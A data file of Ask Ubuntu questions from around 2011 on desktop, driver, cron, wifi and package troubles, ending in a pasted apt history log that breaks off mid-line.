56679	always visible notifications in gnome3	i 've installed gnome3 on ubuntu 11.04 via the ppa and it mostly works fine . however i am a bit unhappy about the notification panel being invisible . i understand the general concept of notifications being shown for a short amount of time and then you can find them again in the unobstrusive notification tray . however this neglects the use case that i did not notice the on-screen notification ( e.g . talking on the phone , or having left the computer for a second or two ) . so if i miss a notification i will have to check the tray to see it . basically this means that i am checking the tray all the time for missing notifications which is really counter-productive . is there some way to get the notification tray to stay visible ? or to have it in the top-panel ? or any other means to see `` notifications pending '' ?
56683	where is the cron / crontab log ?	i want to verify if my cron job is executing and what time . i believe there is a log for my sudo crontab -e jobs , but where ? i searched google and it i found references to look in /var/log ( which i do not see anything with 'cron ' ) and to edit the file /etc/syslog.conf which i also do not have . ?
56686	environment font size is too small	so i 've chosen a font by system settings - > application appearance - > fonts and there i 've adjusted all fonts to be of 14th size . and also checked `` use my kde fonts ... '' in gtk+ appearance . i 've also did the same using kdesudo systemsettings but still some fonts are tiny ! it 's not the 14th size ! edit 2 : i thought it might be one of gnome font settings . so i 've increased all fonts in gnome-tweak-tool sudo gnome-tweak-tool gconf-editor sudo gconf-editor no help ! edit : ubuntu tweak also gives no help ( note the tiny fonts ! ) : edit : it looks like the problem is with gtk3 : when i compile emacs 24.0.92 with gtk3 - i get small menu fonts . when i do the same with a default gtk2 - everything is all right .
56687	how to chroot ubuntu+1 ?	what is the recommended way to use chroot from ubuntu stable ( in my case 11.04 ) with ubuntu+1 ( 11.10 ) ? linked ( but probably separate ) is `` is there anything special that i need to do in order to get xorg working ? '' reason i ask is because i 'd like to test a few gtk3 programs without losing my current ( stable ) ubuntu , or having to get my data synced . i thought about maybe running a ssh server from 11.10 and then using ssh 's x forwarding , but that seems rather cumbersome .
56689	my graphics card gets too hot	i have a hp g62 with an ati mobility radeon hd 5470 graphics card . back when i was using ubuntu 10.04 i tried to install the catalyst drivers and probably other ones too but could not get them working . i would , in the end , end up with blank screens all the time . so i gave up and did not install any drivers ( i am also not the only one with the problem : http : //ubuntuforums.org/showthread.php ? p=8972359 , and i have tried everything in the thread ) . when i rung sensors in the console i get sensors acpitz-virtual-0 adapter : virtual device temp1 : +68.0째c ( crit = +90.0째c ) radeon-pci-0100 adapter : pci adapter temp1 : +84.5째c as you can see the graphics card is getting too hot . what can i do about this ? everything works fine under windows 7 ( 64bit ) . i do n't know the temp but i can feel and hear the difference ( it is much cooler and the fan does not work that much ) .
56691	wine games resolution/sound problems	first , the sound . it has never worked for me ( in any game ) i 'm currently using wine version 1.3.25 ( i 'm pretty sure , is there a terminal command that checks that ? ) . i 've done some searching and tried some different things , but nothing has worked . does anyone have any ideas ( sorry for the lack of information , but i have no idea what to do ) ? resolution question moved to : wine games resolution not working properly
56693	is it possible to use ubuntu as a windows local network server ?	our local network server is running windows server 2008 and most of clients are xp machines . ( except me that am an ubuntu guy : ) currently i installed samba-client and can share my files on the network . is it possible to configure an ubuntu server as a windows network server ? if possible i would like to replace our windows server with ubuntu . it should be able to manage directory access and workgroups as like as windows server .
56698	change altgr to ctrl	i 'm starting to use emacs , and as any ( emacs ) user should know , you constantly use ctrl . however , in my current layout , the right ctrl is too far away to be used constantly , and altgr is in the perfect position . is there any way to make altgr behave as ctrl , and be able to change that behaviour easily ?
56702	booting to no display	everything was working fine this morning . in the afternoon , i tried to boot into ubuntu lucid lynx once again and i see no display . i hear the sound prompts of the login screen , so i press enter and type in my password , and i hear the sound of the ubuntu desktop . which means that everything is working fine except that it does not display anything on my screen . what can be a solution to this ? update : it fixed itself , somehow . i still dont have a clue what the problem was so i will provide the details : when i see the gnu grub menu , i see the following options ubuntu , with linux 2.6.38.10 - generic ubuntu , with linux 2.6.38.10 - generic ( recovery mode ) ubuntu , with linux 2.6.33.10 - generic ubuntu , with linux 2.6.33.10 - generic ( recovery mode ) i normally use the first option to login , but i would just see a message ( i remember it had something like ram not loaded , or detected ) and then it will go into blank screen . i tried logging with the second option ( recovery mode ) as it looked like what i needed , and it had the oldschool dos-style blue menu , where i checked the option 'load ubuntu normally ' and i was taken to a cli . i tried pwd , and it was showing my home directory . i navigated to one of my directories and compiled and executed a c++ program and it seemed everything was working fine . so i manually restarted and checked the first booting option , and everything is fine . what could be a possible diagnosis of the problem i faced so that i dont face it again ?
56703	netbook wifi switch not working on a toshiba nb255-n245	i recently bought a toshiba nb255-n245 and installed 11.04 with wubi . it 's working great , except that the fn+f8 key , which should toggle the wifi on and off , does not have any effect in ubuntu . it works fine in windows 7 . i 'd like to be able to switch off sometimes to save battery , etc . any ideas how to make it work ? i tried rfkill block , but the wifi light on the indicator panel stays on . or if it 's been turned off on the windows side , rfkill unblock wo n't turn it on . edit : as i said in a comment , sudo ifconfig wlan0 down brings the wifi down temporarily , but then it comes back up after a few seconds . i booted up again after having disabled wifi via fn+f8 on the windows side . ubuntu boots up with the indicator light off . i tried rfkill unblock wifi and rfkill unblock all with no effect or message . ifconfig -a does show wlan0 , but sudo ifconfig wlan0 up gives an error message : siocsifflags : operation not possible due to rf-kill this machine has an atheros chipset , btw . lspci reports : 07:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) i noticed that the network panel applet reports `` wireless is disabled by hardware switch '' . edit 2 : i found a bug report for this : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/764524
56705	sidescrolling with touchpad ?	i just booted up my laptop and opened up my webbrowser . i went to omg ! ubuntu ! , and wanted to scroll as i always do , with the right side of my laptop 's touchpad ... it did not work ... i went to the control center to check if the option was still enabled ... and after going through all of the options in the control center , i must come to a conclusion ... the option has been removed ! can anyone tell me why this usefull function has been removed and how to turn it back on again somehow ? preferably just having the option back and working in the correct dialog . this one option made touchpad navigation 10 times easier in ubuntu than it was in windows ... and now it appears they have removed it ... please ! ! ! i beg you ! ! ! ! *cough* 2 reboots fixed it for some strange reason ...
56712	adding ppa does not make new packages available	i added the mono ppa ( https : //launchpad.net/~directhex/+archive/monoxide ) to my maverick server and did an apt-get update . however , when i try to install mono , i still get the older version - not the one from the ppa . apt-cache also shows me only the older version . am i missing something ?
56715	ubuntu calendar easteregg/spam ?	when selecting a date from the ubuntu calendar and drag into firefox it redirects to this page http : //cdn.ruanjian.com/bibei/ is this intentional ?
56717	is there a way to install beagle on 11.04 ?	beagle , a great desktop search engine which was part of ubuntu is discontinued for some time now and removed from ubuntu from 10.04 and afterwards . even though there are a lot of alternative apps such as tracker and catfish i would like to continue using beagle , til it is no longer usable . so , i was wondering if there is any way at all to install beagle on ubuntu 11.04 . whether that is an unstable synaptic package or a .deb file from some shady site on the internet . even though my knowledge on linux is limited , could i browse to a older ubuntu live cd and extract it ( is that even possible ? ) from the installed repositories as .deb ?
56719	what file resets fstab on persistent live environments ?	i 'm trying to add lines to my /etc/fstab file . but the lines i add get cleared on reboot because i am using a persistent live usb stick . i do n't want a lecture . i just want to know which file writes the /etc/fstab file at restart and i want to alter that file so that i can auto mount the disk i want . so this is not really a question but more like a request . i am requesting the location of the file/files that are responsible for writing to or resetting /etc/fstab on restart .
56726	can i copy my wubi install between machines ?	i mostly run ubuntu via wubi on my computer . i recently got a new one . i installed wubi onto there as well but rather going through the hassle of configuring everything anew , since the whole wubi disk is essentially a single file can i not just simply copy it to the new machine ? a quick look at the file structure indicates that i would just copy the c : \ubuntu\disks folder from my old machine and overwrite it on my new one and i 'll be good to go . is this accurate ?
56729	ttc fonts support	can ubuntu ( or linux ) properly support .ttc font format ? i have copied from my windows 7 partition to ubuntu 10.04 some fonts , including entire cambria family , but it seems like default cambria version with .ttc extension can not be displayed in linux . libreoffice recognizes cambria fonts , but i can not select default version , only italic , bold and bold italic which are .ttf download and try it for yourself , maybe i am doing something wrong . http : //www.mediafire.com/ ? lc319rgolrywa35
56731	create terminal to command	i have to create several projects with a folder structure , in those folders will be some files . every time i have to create a project , i have to create a folder , copy folders and files from another one and paste on the new folder . i want to make this as easy as possible and thought about using a terminal command to do so , like : projects create `` project_name '' ubuntu will then create the folder and files on the new project folder . thanks in advance for any help . edit : i use a php framework , codeigniter , i need to replicate its structure to other folders , i need to make it as dynamic as possible . edit : what i need is something like this ? codeigniter create `` project_name '' when i press enter , it will copy all files and folders from a defined location and paste it on a new folder , also on a defined location with the project_name . the location must be defined because it needs to be on a apache htdocs folder
56733	alternative wireless streaming adapter to apple airplay/airport	i 'm succesfully streaming my audio to an apple airport very easily . i 'm considering purchasing a device which enables me to stream my music wirelessly using the network . i would like to stream using the network and not by bluetooth . i found some bluetooth devices , but my laptop does not have bluetooth and i 'm not fond of having a bluetooth dongle permanently . so , is there a low-cost alternative network enabled audio streaming adapter that allows airplay to stereo streaming ? thanks !
56734	what are the /dev/ramx devices ?	in /dev i have 12 or so devices named ram0 ram1 etc . what are those ? what can they be used for ?
56737	source/dot operator error on login . possibly caused by bad byobu uninstall	i am getting an error message every time i ssh into my box or run sudo -i . it looks like this for login : login as : person chands @ ubuntu-server 's password : -bash : . : filename argument required . : usage : . filename [ arguments ] chands @ ubuntu-server : ~ $ and like this when i execute sudo -i : chands @ ubuntu-server : ~ $ sudo -i [ sudo ] password for chands : -bash : . : filename argument required . : usage : . filename [ arguments ] root @ ubuntu-server : ~ # this error does n't appear when i launch screen , when i use sudo to execute some other commands , when i execute sudo su and not even when i su into chands from root . i checked ~/.bashrc for both chands and root and /etc/bash.bashrc but all three of them are the defaults and none of them have any errors with . usage . also , this error started happening after i removed and purged byobu from my system . i do n't know if this has anything to do with the problem , but that 's my point of reference before which everything worked fine . what could be going wrong here ? any ideas anyone ?
56738	what mesa and x.org version will ubuntu 11.10 use	with only 2 months left , what version of mesa and x.org will ubuntu 11.10 use . i ask this because of the changes to intel graphic cards in the latest ones .
56741	login window missing at startup	after having some problems with my de after upgrading from gnome 2 to gnome 3 , and then downgrading , and then installing and uninstalling xmonad , one day at start-up my login window was missing . it 's not an entirely blank screen , though . the background is still there , and the on-screen keyboard which i have set to load at start-up is there as well . i can still switch to tty1-6 just fine , and so i 've copied some log files that might be of some use in identifying the problem . they 'll be posted below ( 1 per post , since they 're long ) . thanks in advance for any help . i 'll be going on a trip for a week in 2 days , and so if i ca n't fix this before then , i 'll probably be stuck with a liveusb , so any assistance is greatly appreciated . /var/log/apt/history.log start-date : 2011-08-03 18:27:25 install : libevolution : amd64 ( 2.32.2-0ubuntu7 , automatic ) , libgnome-bluetooth8 : amd64 ( 2.91.2.is.2.32.0-0ubuntu3 ) , libcanberra-gtk3-0 : amd64 ( 0.28-0ubuntu3 ) , libgnome-desktop-3-0 : amd64 ( 3.0.0-0ubuntu1 ) , gnome-applets : amd64 ( 2.32.1.1-0ubuntu5 , automatic ) , network-manager-gnome : amd64 ( 0.8.4~git.20110318t152954.9c4c9a0-0ubuntu1 ) , totem-plugins : amd64 ( 2.32.0-0ubuntu10 , automatic ) , evolution-plugins : amd64 ( 2.32.2-0ubuntu7 , automatic ) , evolution : amd64 ( 2.32.2-0ubuntu7 ) , gnome-settings-daemon : amd64 ( 2.32.1-0ubuntu13.1 ) , indicator-applet-complete : amd64 ( 0.4.12-0ubuntu1 , automatic ) , gir1.2-json-glib-1.0 : amd64 ( 0.12.2-0ubuntu1 , automatic ) , xulrunner-2.0-mozjs : amd64 ( 2.0+nobinonly-0ubuntu1 , automatic ) , libmutter0 : amd64 ( 3.0.0-0ubuntu1 ) , libgtk-3-bin : amd64 ( 3.0.8-0ubuntu1 ) , indicator-applet-appmenu : amd64 ( 0.4.12-0ubuntu1 , automatic ) , eog : amd64 ( 2.32.1-0ubuntu2 ) , libgtk-3-0 : amd64 ( 3.0.8-0ubuntu1 ) , gnome-bluetooth : amd64 ( 2.91.2.is.2.32.0-0ubuntu3 ) , gnome-user-share : amd64 ( 2.30.2-0ubuntu2 ) , libgail-3-0 : amd64 ( 3.0.8-0ubuntu1 ) , evince : amd64 ( 2.32.0-0ubuntu12 ) , gnome-screensaver : amd64 ( 2.30.2-0ubuntu2 ) , libcanberra-gtk3-module : amd64 ( 0.28-0ubuntu3 ) , gnome-control-center : amd64 ( 2.32.1-0ubuntu15 ) , evolution-data-server : amd64 ( 2.32.2-0ubuntu2 , automatic ) , brasero : amd64 ( 2.32.1-0ubuntu2 ) , gnome-panel : amd64 ( 2.32.1-0ubuntu6.5 , automatic ) , capplets-data : amd64 ( 2.32.1-0ubuntu15 , automatic ) , totem : amd64 ( 2.32.0-0ubuntu10 ) , totem-mozilla : amd64 ( 2.32.0-0ubuntu10 , automatic ) , gnome-icon-theme : amd64 ( 2.31.0-0ubuntu2 , automatic ) , libgtk-3-common : amd64 ( 3.0.8-0ubuntu1 , automatic ) downgrade : gir1.2-notify-0.7 : amd64 ( 0.7.3-1~natty1 , 0.7.2-0ubuntu2 ) , libpolkit-backend-1-0 : amd64 ( 0.101-4~natty1 , 0.101-1ubuntu1 ) , gnome-session-canberra : amd64 ( 0.28-0ubuntu7~natty1 , 0.28-0ubuntu3 ) , libatk1.0-0 : amd64 ( 2.0.1-2~natty1 , 2.0.0-0ubuntu1 ) , gconf2-common : amd64 ( 2.32.4-1ubuntu1~natty1 , 2.32.2-0ubuntu2 ) , telepathy-logger : amd64 ( 0.2.10-1~natty1 , 0.2.6-1ubuntu1 ) , metacity : amd64 ( 2.34.0-0ubuntu1~natty1 , 2.30.3-0ubuntu8 ) , telepathy-gabble : amd64 ( 0.12.0-1~natty1 , 0.11.10-1ubuntu1 ) , gnome-session-bin : amd64 ( 2.32.1-0ubuntu20 , 2.32.1-0ubuntu19 ) , libxklavier16 : amd64 ( 5.1-1ubuntu1~natty1 , 5.0-2ubuntu1 ) , libgconf2-dev : amd64 ( 2.32.4-1ubuntu1~natty1 , 2.32.2-0ubuntu2 ) , poppler-utils : amd64 ( 0.16.7-2ubuntu1~natty1 , 0.16.4-0ubuntu1 ) , gir1.2-upowerglib-1.0 : amd64 ( 0.9.12-1~natty1 , 0.9.9-4 ) , libglib2.0-data : amd64 ( 2.28.8-0ubuntu1~natty1 , 2.28.6-0ubuntu1 ) , libatk1.0-data : amd64 ( 2.0.1-2~natty1 , 2.0.0-0ubuntu1 ) , libpangomm-1.4-1 : amd64 ( 2.28.2-1~natty1 , 2.28.1-0ubuntu1 ) , upower : amd64 ( 0.9.12-1~natty1 , 0.9.9-4 ) , desktop-file-utils : amd64 ( 0.18-0ubuntu5~natty1 , 0.18-0ubuntu4 ) , libecal1.2-8 : amd64 ( 3.0.2.1-0ubuntu1~natty1 , 2.32.2-0ubuntu2 ) , gir1.2-telepathyglib-0.12 : amd64 ( 0.14.9-0ubuntu1~natty1 , 0.14.3-1ubuntu1 ) , libibus2 : amd64 ( 1.3.9-2ubuntu1~natty1 , 1.3.9-0ubuntu3 ) , telepathy-haze : amd64 ( 0.5.0-1~natty1 , 0.4.0-1ubuntu ) , gir1.2-freedesktop : amd64 ( 0.10.8-1ubuntu1~natty1 , 0.10.7-0ubuntu1 ) , ibus-gtk : amd64 ( 1.3.9-2ubuntu1~natty1 , 1.3.9-0ubuntu3 ) , libtelepathy-logger2 : amd64 ( 0.2.10-1~natty1 , 0.2.6-1ubuntu1 ) , gnome-menus : amd64 ( 3.0.0-0ubuntu1 , 2.30.5-0ubuntu3 ) , accountsservice : amd64 ( 0.6.13-1~natty1 , 0.6.1-1 ) , empathy-common : amd64 ( 2.34.0-0ubuntu3.1 , 2.34.0-0ubuntu3 ) , libvte-common : amd64 ( 0.28.1-1ubuntu1~natty1 , 0.27.90-0ubuntu1 ) , gnome-session-common : amd64 ( 2.32.1-0ubuntu20 , 2.32.1-0ubuntu19 ) , libwebkitgtk-1.0-common : amd64 ( 1.4.2-0ubuntu1~natty1 , 1.3.13-0ubuntu2 ) , libpolkit-gobject-1-0 : amd64 ( 0.101-4~natty1 , 0.101-1ubuntu1 ) , gconf2 : amd64 ( 2.32.4-1ubuntu1~natty1 , 2.32.2-0ubuntu2 ) , telepathy-idle : amd64 ( 0.1.10-1~natty1 , 0.1.8-1ubuntu1 ) , python-apt : amd64 ( 0.8.0~exp4ubuntu1~natty1 , 0.7.100.3ubuntu6 ) , libgirepository-1.0-1 : amd64 ( 0.10.8-1ubuntu1~natty1 , 0.10.7-0ubuntu1 ) , libnotify4 : amd64 ( 0.7.3-1~natty1 , 0.7.2-0ubuntu2 ) , libstartup-notification0 : amd64 ( 0.12-1~natty1 , 0.10-1build1 ) , python-apt-common : amd64 ( 0.8.0~exp4ubuntu1~natty1 , 0.7.100.3ubuntu6 ) , libavahi-glib1 : amd64 ( 0.6.30-3ubuntu1~natty1 , 0.6.30-0ubuntu2 ) , policykit-1 : amd64 ( 0.101-4~natty1 , 0.101-1ubuntu1 ) , evolution-common : amd64 ( 3.0.2-0ubuntu1~natty1 , 2.32.2-0ubuntu7 ) , telepathy-salut : amd64 ( 0.5.0-1~natty1 , 0.4.0-1 ) , libcanberra-gtk-module : amd64 ( 0.28-0ubuntu7~natty1 , 0.28-0ubuntu3 ) , libpam-ck-connector : amd64 ( 0.4.5-1~natty1 , 0.4.4-1 ) , mutter-common : amd64 ( 3.0.2.1-2ubuntu2~natty1 , 3.0.0-0ubuntu1 ) , libgweather-common : amd64 ( 3.0.2-0ubuntu1~natty1 , 2.30.3-1ubuntu1 ) , gnome-desktop3-data : amd64 ( 3.0.2-2~natty1 , 3.0.0-0ubuntu1 ) , libsoup-gnome2.4-1 : amd64 ( 2.34.3-1~natty1 , 2.34.0-0ubuntu1 ) , gir1.2-polkit-1.0 : amd64 ( 0.101-4~natty1 , 0.101-1ubuntu1 ) , metacity-common : amd64 ( 2.34.0-0ubuntu1~natty1 , 2.30.3-0ubuntu8 ) , avahi-utils : amd64 ( 0.6.30-3ubuntu1~natty1 , 0.6.30-0ubuntu2 ) , gnome-nettool : amd64 ( 2.32.0-0ubuntu1.1 , 2.32.0-0ubuntu1 ) , libglibmm-2.4-1c2a : amd64 ( 2.28.1-1~natty1 , 2.28.0-1 ) , gir1.2-soup-2.4 : amd64 ( 2.34.3-1~natty1 , 2.34.0-0ubuntu1 ) , librsvg2-common : amd64 ( 2.34.0-0ubuntu5~natty1 , 2.32.1-0ubuntu3 ) , libatk1.0-dev : amd64 ( 2.0.1-2~natty1 , 2.0.0-0ubuntu1 ) , librsvg2-dev : amd64 ( 2.34.0-0ubuntu5~natty1 , 2.32.1-0ubuntu3 ) , python-gmenu : amd64 ( 3.0.0-0ubuntu1 , 2.30.5-0ubuntu3 ) , libwnck22 : amd64 ( 2.30.6-0ubuntu4~natty1 , 2.30.6-0ubuntu3 ) , libavahi-common-data : amd64 ( 0.6.30-3ubuntu1~natty1 , 0.6.30-0ubuntu2 ) , libavahi-core7 : amd64 ( 0.6.30-3ubuntu1~natty1 , 0.6.30-0ubuntu2 ) , libck-connector0 : amd64 ( 0.4.5-1~natty1 , 0.4.4-1 ) , gir1.2-telepathylogger-0.2 : amd64 ( 0.2.10-1~natty1 , 0.2.6-1ubuntu1 ) , libgconf2-4 : amd64 ( 2.32.4-1ubuntu1~natty1 , 2.32.2-0ubuntu2 ) , gir1.2-gconf-2.0 : amd64 ( 2.32.4-1ubuntu1~natty1 , 2.32.2-0ubuntu2 ) , libcairomm-1.0-1 : amd64 ( 1.10.0-1~natty1 , 1.9.8-0ubuntu1 ) , libgdk-pixbuf2.0-0 : amd64 ( 2.23.5-2~natty1 , 2.23.3-0ubuntu1 ) , libgdata-common : amd64 ( 0.8.1-1~natty1 , 0.8.0-0ubuntu1 ) , libgdk-pixbuf2.0-dev : amd64 ( 2.23.5-2~natty1 , 2.23.3-0ubuntu1 ) , gnome-orca : amd64 ( 3.0.2-0ubuntu1~natty~build1 , 3.0.0-0ubuntu2 ) , telepathy-butterfly : amd64 ( 0.5.15-2.1~natty1 , 0.5.15-1 ) , libgdata11 : amd64 ( 0.8.1-1~natty1 , 0.8.0-0ubuntu1 ) , libgdu0 : amd64 ( 3.0.2-1ubuntu1~natty1 , 2.32.1-0ubuntu4 ) , gdm : amd64 ( 2.32.1-0ubuntu3.2 , 2.32.1-0ubuntu3 ) , libclutter-1.0-common : amd64 ( 1.6.16-0ubuntu3~natty1 , 1.6.14-0ubuntu3 ) , libavahi-ui0 : amd64 ( 0.6.30-3ubuntu1~natty1 , 0.6.30-0ubuntu2 ) , gjs : amd64 ( 0.7.14-1ubuntu2~natty1 , 0.7.13-2ubuntu1 ) , libtelepathy-glib0 : amd64 ( 0.14.9-0ubuntu1~natty1 , 0.14.3-1ubuntu1 ) , python-vte : amd64 ( 0.28.1-1ubuntu1~natty1 , 0.27.90-0ubuntu1 ) , libvte9 : amd64 ( 0.28.1-1ubuntu1~natty1 , 0.27.90-0ubuntu1 ) , gconf-defaults-service : amd64 ( 2.32.4-1ubuntu1~natty1 , 2.32.2-0ubuntu2 ) , libegroupwise1.2-13 : amd64 ( 3.0.2.1-0ubuntu1~natty1 , 2.32.2-0ubuntu2 ) , libgtop2-common : amd64 ( 2.28.3-2~natty1 , 2.28.3-0ubuntu1 ) , libclutter-1.0-0 : amd64 ( 1.6.16-0ubuntu3~natty1 , 1.6.14-0ubuntu3 ) , evince-common : amd64 ( 2.32.0-0ubuntu12.2 , 2.32.0-0ubuntu12 ) , vino : amd64 ( 2.32.1-0ubuntu2.1 , 2.32.1-0ubuntu2 ) , gir1.2-atk-1.0 : amd64 ( 2.0.1-2~natty1 , 2.0.0-0ubuntu1 ) , libpoppler-glib6 : amd64 ( 0.16.7-2ubuntu1~natty1 , 0.16.4-0ubuntu1 ) , libnotify-dev : amd64 ( 0.7.3-1~natty1 , 0.5.0-2ubuntu1 ) , libcanberra-gtk0 : amd64 ( 0.28-0ubuntu7~natty1 , 0.28-0ubuntu3 ) , libpango1.0-dev : amd64 ( 1.28.4-0ubuntu2~natty2 , 1.28.4-0ubuntu1 ) , nautilus-sendto : amd64 ( 2.32.0-0ubuntu1.1 , 2.32.0-0ubuntu1 ) , libdconf0 : amd64 ( 0.7.5-3~natty1 , 0.7.3-0ubuntu1 ) , libtotem-plparser17 : amd64 ( 2.32.5-2~natty1 , 2.32.4-0ubuntu1 ) , gir1.2-glib-2.0 : amd64 ( 0.10.8-1ubuntu1~natty1 , 0.10.7-0ubuntu1 ) , libgtop2-7 : amd64 ( 2.28.3-2~natty1 , 2.28.3-0ubuntu1 ) , gir1.2-gdkpixbuf-2.0 : amd64 ( 2.23.5-2~natty1 , 2.23.3-0ubuntu1 ) , libquvi0 : amd64 ( 0.2.15-1~natty1 , 0.2.11-1 ) , gsettings-desktop-schemas : amd64 ( 3.0.1-1ubuntu3~natty1 , 3.0.0-0ubuntu1 ) , ibus : amd64 ( 1.3.9-2ubuntu1~natty1 , 1.3.9-0ubuntu3 ) , libupower-glib1 : amd64 ( 0.9.12-1~natty1 , 0.9.9-4 ) , avahi-daemon : amd64 ( 0.6.30-3ubuntu1~natty1 , 0.6.30-0ubuntu2 ) , libmission-control-plugins0 : amd64 ( 5.7.11-1~natty1 , 5.7.7-1 ) , librsvg2-2 : amd64 ( 2.34.0-0ubuntu5~natty1 , 2.32.1-0ubuntu3 ) , libavahi-client3 : amd64 ( 0.6.30-3ubuntu1~natty1 , 0.6.30-0ubuntu2 ) , libwnck-common : amd64 ( 2.30.6-0ubuntu4~natty1 , 2.30.6-0ubuntu3 ) , libwebkitgtk-1.0-0 : amd64 ( 1.4.2-0ubuntu1~natty1 , 1.3.13-0ubuntu2 ) , policykit-desktop-privileges : amd64 ( 0.7~natty1 , 0.4 ) , libpolkit-agent-1-0 : amd64 ( 0.101-4~natty1 , 0.101-1ubuntu1 ) , evolution-data-server-common : amd64 ( 3.0.2.1-0ubuntu1~natty1 , 2.32.2-0ubuntu2 ) , libpango1.0-0 : amd64 ( 1.28.4-0ubuntu2~natty2 , 1.28.4-0ubuntu1 ) , libgnome-menu2 : amd64 ( 3.0.0-0ubuntu1 , 2.30.5-0ubuntu3 ) , yelp-xsl : amd64 ( 3.0.2-1~natty1 , 3.0.0-0ubuntu1 ) , libavahi-gobject0 : amd64 ( 0.6.30-3ubuntu1~natty1 , 0.6.30-0ubuntu2 ) , libmetacity-private0 : amd64 ( 2.34.0-0ubuntu1~natty1 , 2.30.3-0ubuntu8 ) , python-ibus : amd64 ( 1.3.9-2ubuntu1~natty1 , 1.3.9-0ubuntu3 ) , avahi-autoipd : amd64 ( 0.6.30-3ubuntu1~natty1 , 0.6.30-0ubuntu2 ) , libjson-glib-1.0-0 : amd64 ( 0.13.4-2~natty1 , 0.12.2-0ubuntu1 ) , libavahi-common3 : amd64 ( 0.6.30-3ubuntu1~natty1 , 0.6.30-0ubuntu2 ) , libpam-gnome-keyring : amd64 ( 3.0.3-2~natty1 , 2.92.92.is.2.32.1-0ubuntu2 ) , libpoppler13 : amd64 ( 0.16.7-2ubuntu1~natty1 , 0.16.4-0ubuntu1 ) , libgjs0b : amd64 ( 0.7.14-1ubuntu2~natty1 , 0.7.13-2ubuntu1 ) , gnome-doc-utils : amd64 ( 0.20.6-0ubuntu1~natty1 , 0.20.5-0ubuntu1 ) , nautilus-sendto-empathy : amd64 ( 2.34.0-0ubuntu3.1 , 2.34.0-0ubuntu3 ) , libedataserver1.2-14 : amd64 ( 3.0.2.1-0ubuntu1~natty1 , 2.32.2-0ubuntu2 ) , file-roller : amd64 ( 2.32.2-0ubuntu0.1 , 2.32.1-0ubuntu4 ) , libebook1.2-10 : amd64 ( 3.0.2.1-0ubuntu1~natty1 , 2.32.2-0ubuntu2 ) , gir1.2-clutter-1.0 : amd64 ( 1.6.16-0ubuntu3~natty1 , 1.6.14-0ubuntu3 ) , telepathy-mission-control-5 : amd64 ( 5.7.11-1~natty1 , 5.7.7-1 ) , glib-networking : amd64 ( 2.28.7-1~natty1 , 2.28.5-0ubuntu1 ) , libatkmm-1.6-1 : amd64 ( 2.22.5-1~natty1 , 2.22.5-0ubuntu1 ) , gir1.2-pango-1.0 : amd64 ( 1.28.4-0ubuntu2~natty2 , 1.28.4-0ubuntu1 ) , libsoup2.4-1 : amd64 ( 2.34.3-1~natty1 , 2.34.0-0ubuntu1 ) , libgnomekbd-common : amd64 ( 3.0.0.1-1~natty1 , 2.32.0-0ubuntu1 ) , consolekit : amd64 ( 0.4.5-1~natty1 , 0.4.4-1 ) remove : libkresources4 : amd64 ( 4.6.2-0ubuntu1 ) , mesa-utils : amd64 ( 8.0.1+git20110129+d8f7d6b-0ubuntu2 ) , libkprintutils4 : amd64 ( 4.6.2-0ubuntu4 ) , libkldap4 : amd64 ( 4.6.2-0ubuntu1 ) , linux-headers-2.6.38-8-generic : amd64 ( 2.6.38-8.42 ) , libqt4-qt3support : amd64 ( 4.7.2-0ubuntu6.2 ) , libebackend-1.2-1 : amd64 ( 3.0.2.1-0ubuntu1~natty1 ) , libknewstuff2-4 : amd64 ( 4.6.2-0ubuntu4 ) , linux-headers-2.6.38-8 : amd64 ( 2.6.38-8.42 ) , gir1.2-json-1.0 : amd64 ( 0.13.4-2~natty1 ) , libboost-program-options1.42.0 : amd64 ( 1.42.0-4ubuntu2 ) , libakonadi-kmime4 : amd64 ( 4.6.2-0ubuntu1 ) , libakonadiprotocolinternals1 : amd64 ( 1.5.2-0ubuntu1 ) , gnome-control-center-data : amd64 ( 3.0.2-1ubuntu3~natty1 ) , libmozjs185-1.0 : amd64 ( 1.8.5-1.0.0-0ubuntu5 ) , mysql-server-core-5.1 : amd64 ( 5.1.54-1ubuntu4 ) , apturl-kde : amd64 ( 0.4.2ubuntu5.1 ) , libaccountsservice0 : amd64 ( 0.6.13-1~natty1 ) , kdesudo : amd64 ( 3.4.2.3-2ubuntu3 ) , libedata-cal-1.2-11 : amd64 ( 3.0.2.1-0ubuntu1~natty1 ) , akonadi-server : amd64 ( 1.5.2-0ubuntu1 ) , libmicroblog4 : amd64 ( 4.6.2-0ubuntu1 ) , libedata-book-1.2-9 : amd64 ( 3.0.2.1-0ubuntu1~natty1 ) , apg : amd64 ( 2.2.3.dfsg.1-2 ) , libkabc4 : amd64 ( 4.6.2-0ubuntu1 ) , mysql-client-core-5.1 : amd64 ( 5.1.54-1ubuntu4 ) , software-properties-kde : amd64 ( 0.80.9 ) , libkcal4 : amd64 ( 4.6.2-0ubuntu1 ) , libcamel-1.2-23 : amd64 ( 3.0.2.1-0ubuntu1~natty1 ) , libkimap4 : amd64 ( 4.6.2-0ubuntu1 ) , libmailtransport4 : amd64 ( 4.6.2-0ubuntu1 ) , libkmime4 : amd64 ( 4.6.2-0ubuntu1 ) , kdepimlibs-kio-plugins : amd64 ( 4.6.2-0ubuntu1 ) , libakonadi-kabc4 : amd64 ( 4.6.2-0ubuntu1 ) , python-gnomeapplet : amd64 ( 2.32.0-0ubuntu2 ) , libkpimutils4 : amd64 ( 4.6.2-0ubuntu1 ) , kdepim-runtime : amd64 ( 4.4.10-0ubuntu2 ) , libakonadi-kcal4 : amd64 ( 4.6.2-0ubuntu1 ) , libakonadi-kde4 : amd64 ( 4.6.2-0ubuntu1 ) , python-kde4 : amd64 ( 4.6.2b-0ubuntu1.1 ) end-date : 2011-08-03 18:36:01 start-date : 2011-08-03 18:43:01 commandline : apt-get upgrade upgrade : telepathy-logger : amd64 ( 0.2.6-1ubuntu1 , 0.2.6-1ubuntu1.2 ) , gnome-session-bin : amd64 ( 2.32.1-0ubuntu19 , 2.32.1-0ubuntu20 ) , poppler-utils : amd64 ( 0.16.4-0ubuntu1 , 0.16.4-0ubuntu1.1 ) , libtelepathy-logger2 : amd64 ( 0.2.6-1ubuntu1 , 0.2.6-1ubuntu1.2 ) , empathy-common : amd64 ( 2.34.0-0ubuntu3 , 2.34.0-0ubuntu3.1 ) , gnome-session-common : amd64 ( 2.32.1-0ubuntu19 , 2.32.1-0ubuntu20 ) , python-apt : amd64 ( 0.7.100.3ubuntu6 , 0.7.100.3ubuntu6.1 ) , python-apt-common : amd64 